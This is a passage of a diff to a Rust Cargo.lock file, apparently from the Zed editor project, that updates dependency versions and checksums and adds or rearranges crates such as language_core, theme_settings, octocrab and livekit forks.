"tree-sitter-gomod", + "tree-sitter-gowork", + "tree-sitter-jsdoc", + "tree-sitter-json", + "tree-sitter-md", + "tree-sitter-python", + "tree-sitter-regex", + "tree-sitter-rust", + "tree-sitter-typescript", + "tree-sitter-yaml", + "util", +] + [[package]] name = "grid" version = "0.18.0" @@ -7843,6 +7934,15 @@ dependencies = [ "smallvec", ] +[[package]] +name = "hash32" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47d60b12902ba28e2730cd37e95b8c9223af2808df9e902d4df49588d1470606" +dependencies = [ + "byteorder", +] + [[package]] name = "hashbrown" version = "0.12.3" @@ -7927,6 +8027,16 @@ dependencies = [ "http 0.2.12", ] +[[package]] +name = "heapless" +version = "0.9.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2af2455f757db2b292a9b1768c4b70186d443bcb3b316252d6b540aec1cd89ed" +dependencies = [ + "hash32", + "stable_deref_trait", +] + [[package]] name = "heck" version = "0.3.3" @@ -8051,7 +8161,7 @@ dependencies = [ "markup5ever 0.12.1", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8148,8 +8258,8 @@ dependencies = [ "async-fs", "async-tar", "bytes 1.11.1", - "derive_more 0.99.20", - "futures 0.3.31", + "derive_more", + "futures 0.3.32", "http 1.3.1", "http-body 1.0.1", "log", @@ -8266,11 +8376,25 @@ dependencies = [ "http 1.3.1", "hyper 1.7.0", "hyper-util", + "log", "rustls 0.23.33", "rustls-native-certs 0.8.2", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.2", + "tower-service", +] + +[[package]] +name = "hyper-timeout" +version = "0.5.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2b90d566bffbce6a75bd8b09a05aa8c2cb1fabb6cb348f8840c9e4c90a0d83b0" +dependencies = [ + "hyper 1.7.0", + "hyper-util", + "pin-project-lite", + "tokio", "tower-service", ] @@ -8509,7 +8633,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3" dependencies = [ "byteorder-lite", - "quick-error", + "quick-error 2.0.1", ] [[package]] @@ -8526,7 +8650,7 @@ dependencies = [ "project", "serde", "settings", - "theme", + "theme_settings", "ui", "util", "workspace", @@ -8585,7 +8709,7 @@ checksum = "c727f80bfa4a6c6e2508d2f05b6f4bfce242030bd88ed15ae5331c5b5d30fba7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8642,7 +8766,7 @@ dependencies = [ "project", "serde_json", "serde_json_lenient", - "theme", + "theme_settings", "ui", "util", "util_macros", @@ -8680,7 +8804,7 @@ checksum = "c34819042dc3d3971c46c2190835914dfbe0c3c13f61449b2997f4e9722dfa60" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8872,7 +8996,7 @@ checksum = "03343451ff899767262ec32146f6d559dd759fdadf42ff0e227c7c48f72594b4" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -8924,9 +9048,9 @@ dependencies = [ [[package]] name = "js-sys" -version = "0.3.81" +version = "0.3.90" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec48937a97411dcb524a265206ccd4c90bb711fca92b2792c407f268825b9305" +checksum = "14dc6f6450b3f6d4ed5b16327f38fed626d375a886159ca555bd7822c0c3a5a6" dependencies = [ "once_cell", "wasm-bindgen", @@ -8988,7 +9112,7 @@ dependencies = [ "bytecount", "data-encoding", "email_address", - "fancy-regex", + "fancy-regex 0.16.2", "fraction", "getrandom 0.3.4", "idna", @@ -9025,14 +9149,14 @@ dependencies = [ [[package]] name = "jupyter-protocol" -version = "1.2.1" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c75a69caf8b8e781224badfb76c4a8da4d49856de36ce72ae3cf5d4a1c94e42" +checksum = "4649647741f9794a7a02e3be976f1b248ba28a37dbfc626d5089316fd4fbf4c8" dependencies = [ "async-trait", "bytes 1.11.1", "chrono", - "futures 0.3.31", + "futures 0.3.32", "serde", "serde_json", "thiserror 2.0.17", @@ -9048,7 +9172,7 @@ dependencies = [ "anyhow", "async-trait", "async-tungstenite", - "futures 0.3.31", + "futures 0.3.32", "jupyter-protocol", "serde", "serde_json", @@ -9085,6 +9209,7 @@ dependencies = [ "telemetry", "tempfile", "theme", + "theme_settings", "tree-sitter-json", "tree-sitter-rust", "ui", @@ -9159,12 +9284,13 @@ dependencies = [ "async-trait", "clock", "collections", + "criterion", "ctor", "diffy", "ec4rs", "encoding_rs", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "globset", "gpui", @@ -9172,6 +9298,7 @@ dependencies = [ "imara-diff", "indoc", "itertools 0.14.0", + "language_core", "log", "lsp", "parking_lot", @@ -9180,7 +9307,6 @@ dependencies = [ "rand 0.9.2", "regex", "rpc", - "schemars", "semver", "serde", "serde_json", @@ -9194,6 +9320,7 @@ dependencies = [ "task", "text", "theme", + "theme_settings", "toml 0.8.23", "tracing", "tree-sitter", @@ -9215,6 +9342,25 @@ dependencies = [ "ztracing", ] +[[package]] +name = "language_core" +version = "0.1.0" +dependencies = [ + "anyhow", + "collections", + "gpui", + "log", + "lsp", + "parking_lot", + "regex", + "schemars", + "serde", + "serde_json", + "toml 0.8.23", + "tree-sitter", + "util", +] + [[package]] name = "language_extension" version = "0.1.0" @@ -9224,7 +9370,7 @@ dependencies = [ "collections", "extension", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "language", "log", @@ -9244,13 +9390,13 @@ dependencies = [ "anthropic", "anyhow", "base64 0.22.1", - "client", "cloud_api_client", "cloud_api_types", "cloud_llm_client", "collections", "credentials_provider", - "futures 0.3.31", + "env_var", + "futures 0.3.32", "gpui", "http_client", "icons", @@ -9259,15 +9405,12 @@ dependencies = [ "open_ai", "open_router", "parking_lot", - "proto", "schemars", "serde", "serde_json", - "settings", "smol", "thiserror 2.0.17", "util", - "zed_env_vars", ] [[package]] @@ -9282,7 +9425,6 @@ dependencies = [ "aws_http_client", "base64 0.22.1", "bedrock", - "chrono", "client", "cloud_api_types", "cloud_llm_client", @@ -9294,11 +9436,10 @@ dependencies = [ "copilot_ui", "credentials_provider", "deepseek", - "editor", "extension", "extension_host", "fs", - "futures 0.3.31", + "futures 0.3.32", "google_ai", "gpui", "gpui_tokio", @@ -9312,9 +9453,9 @@ dependencies = [ "ollama", "open_ai", "open_router", + "opencode", "partial-json-fixer", "pretty_assertions", - "project", "release_channel", "schemars", "semver", @@ -9375,7 +9516,7 @@ dependencies = [ "command_palette_hooks", "edit_prediction", "editor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "language", @@ -9390,6 +9531,7 @@ dependencies = [ "sysinfo 0.37.2", "telemetry", "theme", + "theme_settings", "tree-sitter", "ui", "util", @@ -9409,9 +9551,11 @@ dependencies = [ "async-trait", "chrono", "collections", - "futures 0.3.31", + "fs", + "futures 0.3.32", "globset", "gpui", + "grammars", "http_client", "itertools 0.14.0", "json_schema_store", @@ -9431,7 +9575,6 @@ dependencies = [ "project", "regex", "rope", - "rust-embed", "semver", "serde", "serde_json", @@ -9442,31 +9585,20 @@ dependencies = [ "snippet", "task", "terminal", - "text", "theme", - "toml 0.8.23", "tree-sitter", "tree-sitter-bash", "tree-sitter-c", "tree-sitter-cpp", "tree-sitter-css", - "tree-sitter-diff", "tree-sitter-gitcommit", "tree-sitter-go", - "tree-sitter-gomod", - "tree-sitter-gowork", - "tree-sitter-jsdoc", - "tree-sitter-json", - "tree-sitter-md", "tree-sitter-python", - "tree-sitter-regex", "tree-sitter-rust", "tree-sitter-typescript", - "tree-sitter-yaml", "unindent", "url", "util", - "workspace", ] [[package]] @@ -9511,11 +9643,17 @@ version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7a79a3332a6609480d7d0c9eab957bca6b455b91bb84e66d19f5ff66294b85b8" +[[package]] +name = "libbz2-rs-sys" +version = "0.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2c4a545a15244c7d945065b5d392b2d2d7f21526fba56ce51467b06ed445e8f7" + [[package]] name = "libc" -version = "0.2.177" +version = "0.2.182" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2874a2af47a2325c2001a6e6fad9b16a53b802102b528163885171cf92b15976" +checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" [[package]] name = "libdbus-sys" @@ -9599,10 +9737,11 @@ dependencies = [ [[package]] name = "libwebrtc" -version = "0.3.10" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.3.26" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "cxx", + "glib", "jni", "js-sys", "lazy_static", @@ -9696,9 +9835,12 @@ checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092" [[package]] name = "livekit" -version = "0.7.8" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.7.32" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ + "base64 0.22.1", + "bmrng", + "bytes 1.11.1", "chrono", "futures-util", "lazy_static", @@ -9719,11 +9861,12 @@ dependencies = [ [[package]] name = "livekit-api" -version = "0.4.2" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.4.14" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ + "base64 0.21.7", "futures-util", - "http 0.2.12", + "http 1.3.1", "livekit-protocol", "livekit-runtime", "log", @@ -9731,20 +9874,22 @@ dependencies = [ "pbjson-types", "prost 0.12.6", "rand 0.9.2", - "reqwest 0.11.27", + "reqwest 0.12.24", + "rustls-native-certs 0.6.3", "scopeguard", "serde", "sha2", "thiserror 1.0.69", "tokio", - "tokio-tungstenite 0.26.2", + "tokio-rustls 0.26.2", + "tokio-tungstenite 0.28.0", "url", ] [[package]] name = "livekit-protocol" -version = "0.3.9" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.7.1" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "futures-util", "livekit-runtime", @@ -9752,7 +9897,6 @@ dependencies = [ "pbjson", "pbjson-types", "prost 0.12.6", - "prost-types 0.12.6", "serde", "thiserror 1.0.69", "tokio", @@ -9761,7 +9905,7 @@ dependencies = [ [[package]] name = "livekit-runtime" version = "0.4.0" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "tokio", "tokio-stream", @@ -9795,7 +9939,7 @@ dependencies = [ "core-video", "coreaudio-rs 0.12.1", "cpal", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", "gpui_tokio", @@ -9814,12 +9958,12 @@ dependencies = [ "serde_json", "serde_urlencoded", "settings", - "sha2", "simplelog", "smallvec", - "tokio-tungstenite 0.26.2", + "tokio", "ui", "util", + "webrtc-sys", "zed-scap", ] @@ -9839,7 +9983,7 @@ name = "lmstudio" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -9910,8 +10054,9 @@ dependencies = [ "async-pipe", "collections", "ctor", - "futures 0.3.31", + "futures 0.3.32", "gpui", + "gpui_util", "log", "lsp-types", "parking_lot", @@ -9929,7 +10074,7 @@ dependencies = [ [[package]] name = "lsp-types" version = "0.95.1" -source = "git+https://github.com/zed-industries/lsp-types?rev=a4f410987660bf560d1e617cb78117c6b6b9f599#a4f410987660bf560d1e617cb78117c6b6b9f599" +source = "git+https://github.com/zed-industries/lsp-types?rev=c7396459fefc7886b4adfa3b596832405ae1e880#c7396459fefc7886b4adfa3b596832405ae1e880" dependencies = [ "bitflags 1.3.2", "serde", @@ -10043,23 +10188,29 @@ checksum = "3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" name = "markdown" version = "0.1.0" dependencies = [ + "anyhow", "assets", "base64 0.22.1", "collections", "env_logger 0.11.8", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", + "html5ever 0.27.0", "language", "languages", "linkify", "log", + "markup5ever_rcdom", + "mermaid-rs-renderer", "node_runtime", "pulldown-cmark 0.13.0", "settings", + "stacksafe", "sum_tree", "theme", + "theme_settings", "ui", "util", ] @@ -10069,22 +10220,15 @@ name = "markdown_preview" version = "0.1.0" dependencies = [ "anyhow", - "async-recursion", - "collections", - "crashes", "editor", - "fs", "gpui", - "html5ever 0.27.0", "language", - "linkify", "log", - "markup5ever_rcdom", - "mermaid-rs-renderer", - "pretty_assertions", - "pulldown-cmark 0.13.0", + "markdown", + "project", "settings", - "theme", + "tempfile", + "theme_settings", "ui", "urlencoding", "util", @@ -10137,7 +10281,7 @@ checksum = "ac84fd3f360fcc43dc5f5d186f02a94192761a080e8bc58621ad4d12296a58cf" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -10297,7 +10441,7 @@ dependencies = [ [[package]] name = "mermaid-rs-renderer" version = "0.2.0" -source = "git+https://github.com/zed-industries/mermaid-rs-renderer?branch=fix-font-family-xml-escaping#d91961aa90bc7b0c09c87a13c91d48e2f05c468d" +source = "git+https://github.com/zed-industries/mermaid-rs-renderer?rev=374db9ead5426697c6c2111151d9f246899bc638#374db9ead5426697c6c2111151d9f246899bc638" dependencies = [ "anyhow", "fontdb 0.16.2", @@ -10371,9 +10515,9 @@ dependencies = [ [[package]] name = "minidump-common" -version = "0.21.2" +version = "0.26.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c4d14bcca0fd3ed165a03000480aaa364c6860c34e900cb2dafdf3b95340e77" +checksum = "2e16d10087ae9e375bad7a40e8ef5504bc08e808ccc6019067ff9de42a84570f" dependencies = [ "bitflags 2.10.0", "debugid", @@ -10386,14 +10530,16 @@ dependencies = [ [[package]] name = "minidump-writer" -version = "0.8.9" +version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e2abcd9c8a1e6e1e9d56ce3627851f39a17ea83e17c96bc510f29d7e43d78a7d" +checksum = "0e1fc14d6ded915b8e850801465e7096f77ed60bf87e4e85878d463720d9dc4d" dependencies = [ "bitflags 2.10.0", "byteorder", "cfg-if", "crash-context", + "error-graph", + "failspot", "goblin", "libc", "log", @@ -10401,18 +10547,20 @@ dependencies = [ "memmap2", "memoffset", "minidump-common", - "nix 0.28.0", + "nix 0.29.0", "procfs-core", "scroll", + "serde", + "serde_json", "tempfile", - "thiserror 1.0.69", + "thiserror 2.0.17", ] [[package]] name = "minidumper" -version = "0.8.3" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9b4ebc9d1f8847ec1d078f78b35ed598e0ebefa1f242d5f83cd8d7f03960a7d1" +checksum = "10d9254e42a48098d045472a5c0cb892007a42e25342eddbf2642f6978bf381a" dependencies = [ "cfg-if", "crash-context", @@ -10422,7 +10570,7 @@ dependencies = [ "parking_lot", "polling", "scroll", - "thiserror 1.0.69", + "thiserror 2.0.17", "uds", ] @@ -10440,7 +10588,7 @@ dependencies = [ "rpc", "serde_json", "smol", - "theme", + "theme_settings", "util", "workspace", "zed_actions", @@ -10486,7 +10634,7 @@ version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "536bfad37a309d62069485248eeaba1e8d9853aaf951caaeaed0585a95346f08" dependencies = [ - "windows-sys 0.60.2", + "windows-sys 0.61.2", ] [[package]] @@ -10494,7 +10642,7 @@ name = "mistral" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -10555,7 +10703,6 @@ dependencies = [ "log", "parking_lot", "pretty_assertions", - "project", "rand 0.9.2", "rope", "serde", @@ -10567,6 +10714,7 @@ dependencies = [ "theme", "tracing", "tree-sitter", + "unicode-segmentation", "util", "zlog", "ztracing", @@ -10579,23 +10727,41 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a" [[package]] -name = "multimap" -version = "0.10.1" +name = "naga" +version = "29.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d87ecb2933e8aeadb3e3a02b828fed80a7528047e68b4f424523a0981a3a084" +checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8" +dependencies = [ + "arrayvec", + "bit-set 0.9.1", + "bitflags 2.10.0", + "cfg-if", + "cfg_aliases 0.2.1", + "codespan-reporting", + "half", + "hashbrown 0.16.1", + "hexf-parse", + "indexmap", + "libm", + "log", + "num-traits", + "once_cell", + "rustc-hash 1.1.0", + "thiserror 2.0.17", + "unicode-ident", +] [[package]] name = "naga" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "618f667225063219ddfc61251087db8a9aec3c3f0950c916b614e403486f1135" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", "cfg-if", "cfg_aliases 0.2.1", - "codespan-reporting 0.12.0", + "codespan-reporting", "half", "hashbrown 0.16.1", "hexf-parse", @@ -10647,9 +10813,9 @@ dependencies = [ [[package]] name = "nbformat" -version = "1.1.0" +version = "1.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b10a89a2d910233ec3fca4de359b16ebe95e833c8b2162643ef98c6053a0549d" +checksum = "d4983a40792c45e8639f77ef8e4461c55679cbc618f4b9e83830e8c7e79c8383" dependencies = [ "anyhow", "chrono", @@ -10665,7 +10831,7 @@ name = "nc" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "net", "smol", ] @@ -10761,7 +10927,7 @@ dependencies = [ "async-std", "async-tar", "async-trait", - "futures 0.3.31", + "futures 0.3.32", "http_client", "log", "paths", @@ -10815,12 +10981,10 @@ dependencies = [ "anyhow", "channel", "client", - "collections", "component", "db", "gpui", "rpc", - "settings", "sum_tree", "time", "ui", @@ -10896,7 +11060,7 @@ version = "0.50.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5" dependencies = [ - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -10986,7 +11150,7 @@ checksum = "ed3955f1a9c7c0c15e092f9c887db08b1fc683305fdf6eb6684f22555355e202" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11069,7 +11233,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11087,7 +11251,7 @@ version = "0.9.2" source = "git+https://github.com/KillTheMule/nvim-rs?rev=764dd270c642f77f10f3e19d05cc178a6cbe69f3#764dd270c642f77f10f3e19d05cc178a6cbe69f3" dependencies = [ "async-trait", - "futures 0.3.31", + "futures 0.3.32", "log", "rmp", "rmpv", @@ -11126,10 +11290,20 @@ dependencies = [ ] [[package]] -name = "objc2-audio-toolbox" +name = "objc2-app-kit" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "10cbe18d879e20a4aea544f8befe38bcf52255eb63d3f23eca2842f3319e4c07" +checksum = "e6f29f568bec459b0ddff777cec4fe3fd8666d82d5a40ebd0ff7e66134f89bcc" +dependencies = [ + "objc2", + "objc2-foundation", +] + +[[package]] +name = "objc2-audio-toolbox" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6948501a91121d6399b79abaa33a8aa4ea7857fe019f341b8c23ad6e81b79b08" dependencies = [ "bitflags 2.10.0", "libc", @@ -11142,9 +11316,9 @@ dependencies = [ [[package]] name = "objc2-avf-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bfc1d11521c211a7ebe17739fc806719da41f56c6b3f949d9861b459188ce910" +checksum = "13a380031deed8e99db00065c45937da434ca987c034e13b87e4441f9e4090be" dependencies = [ "objc2", "objc2-foundation", @@ -11152,9 +11326,9 @@ dependencies = [ [[package]] name = "objc2-core-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca44961e888e19313b808f23497073e3f6b3c22bb485056674c8b49f3b025c82" +checksum = "e1eebcea8b0dbff5f7c8504f3107c68fc061a3eb44932051c8cf8a68d969c3b2" dependencies = [ "dispatch2", "objc2", @@ -11194,9 +11368,9 @@ checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33" [[package]] name = "objc2-foundation" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "900831247d2fe1a09a683278e5384cfb8c80c79fe6b166f9d14bfdde0ea1b03c" +checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272" dependencies = [ "bitflags 2.10.0", "block2", @@ -11217,9 +11391,9 @@ dependencies = [ [[package]] name = "objc2-metal" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f246c183239540aab1782457b35ab2040d4259175bd1d0c58e46ada7b47a874" +checksum = "a0125f776a10d00af4152d74616409f0d4a2053a6f57fa5b7d6aa2854ac04794" dependencies = [ "bitflags 2.10.0", "block2", @@ -11229,6 +11403,19 @@ dependencies = [ "objc2-foundation", ] +[[package]] +name = "objc2-quartz-core" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f" +dependencies = [ + "bitflags 2.10.0", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", +] + [[package]] name = "objc_exception" version = "0.1.2" @@ -11249,9 +11436,9 @@ dependencies = [ [[package]] name = "object" -version = "0.36.7" +version = "0.37.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "62948e14d923ea95ea2c7c86c71013138b66525b86bdc08d2dcc262bdb497b87" +checksum = "ff76201f031d8863c38aa7f905eca4f53abbfa15f609db4277d44cd8938f33fe" dependencies = [ "crc32fast", "hashbrown 0.15.5", @@ -11260,12 +11447,45 @@ dependencies = [ ] [[package]] -name = "object" -version = "0.37.3" +name = "octocrab" +version = "0.49.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff76201f031d8863c38aa7f905eca4f53abbfa15f609db4277d44cd8938f33fe" +checksum = "63f6687a23731011d0117f9f4c3cdabaa7b5e42ca671f42b5cc0657c492540e3" dependencies = [ - "memchr", + "arc-swap", + "async-trait", + "base64 0.22.1", + "bytes 1.11.1", + "cargo_metadata 0.23.1", + "cfg-if", + "chrono", + "either", + "futures 0.3.32", + "futures-core", + "futures-util", + "getrandom 0.2.16", + "http 1.3.1", + "http-body 1.0.1", + "http-body-util", + "hyper 1.7.0", + "hyper-rustls 0.27.7", + "hyper-timeout", + "hyper-util", + "jsonwebtoken", + "once_cell", + "percent-encoding", + "pin-project", + "secrecy", + "serde", + "serde_json", + "serde_path_to_error", + "serde_urlencoded", + "snafu", + "tokio", + "tower 0.5.2", + "tower-http 0.6.6", + "url", + "web-time", ] [[package]] @@ -11273,7 +11493,7 @@ name = "ollama" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -11302,6 +11522,7 @@ dependencies = [ "settings", "telemetry", "theme", + "theme_settings", "ui", "util", "vim_mode_setting", @@ -11379,7 +11600,7 @@ name = "open_ai" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "log", "rand 0.9.2", @@ -11397,7 +11618,7 @@ version = "0.1.0" dependencies = [ "editor", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "picker", @@ -11407,6 +11628,7 @@ dependencies = [ "serde_json", "settings", "theme", + "theme_settings", "ui", "util", "workspace", @@ -11417,7 +11639,7 @@ name = "open_router" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -11427,6 +11649,20 @@ dependencies = [ "thiserror 2.0.17", ] +[[package]] +name = "opencode" +version = "0.1.0" +dependencies = [ + "anyhow", + "futures 0.3.32", + "google_ai", + "http_client", + "schemars", + "serde", + "serde_json", + "strum 0.27.2", +] + [[package]] name = "opener" version = "0.7.2" @@ -11462,7 +11698,7 @@ checksum = "a948666b637a0f465e8564c73e89d4dde00d72d4d473cc972f390fc3dcee7d9c" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11491,7 +11727,7 @@ checksum = "969ccca8ffc4fb105bd131a228107d5c9dd89d9d627edf3295cbe979156f9712" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11549,7 +11785,7 @@ dependencies = [ "proc-macro2", "proc-macro2-diagnostics", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11571,8 +11807,7 @@ dependencies = [ "settings", "smol", "theme", - "tree-sitter-rust", - "tree-sitter-typescript", + "theme_settings", "ui", "util", "workspace", @@ -11605,6 +11840,7 @@ dependencies = [ "smallvec", "smol", "theme", + "theme_settings", "ui", "util", "workspace", @@ -11659,7 +11895,7 @@ dependencies = [ "by_address", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11922,7 +12158,7 @@ dependencies = [ "pest_meta", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -11938,7 +12174,7 @@ dependencies = [ [[package]] name = "pet" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "env_logger 0.10.2", @@ -11969,14 +12205,18 @@ dependencies = [ "pet-virtualenvwrapper", "pet-windows-registry", "pet-windows-store", + "pet-winpython", "serde", "serde_json", + "tracing", + "tracing-subscriber", + "winresource", ] [[package]] name = "pet-conda" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -11986,6 +12226,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-reporter", + "rayon", "regex", "serde", "serde_json", @@ -11995,7 +12236,7 @@ dependencies = [ [[package]] name = "pet-core" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "lazy_static", @@ -12010,7 +12251,7 @@ dependencies = [ [[package]] name = "pet-env-var-path" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12026,8 +12267,9 @@ dependencies = [ [[package]] name = "pet-fs" version = "0.1.0" -source = 